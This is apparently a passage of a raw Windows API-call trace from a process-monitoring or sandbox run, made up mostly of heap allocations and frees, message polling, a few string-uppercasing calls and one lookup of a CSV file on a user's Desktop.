RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0111.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0111.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0111.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0111.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0111.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0111.798] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0111.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0111.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0111.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0111.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0111.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0111.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0111.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0111.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0111.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0111.802] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ZvWDNly8ss.csv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0x9a47c0 [0111.802] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0111.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0111.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0111.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0111.803] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0111.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0111.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0111.804] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0111.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0111.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0111.804] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0111.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0111.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0111.805] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0111.805] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0111.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0111.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0111.805] 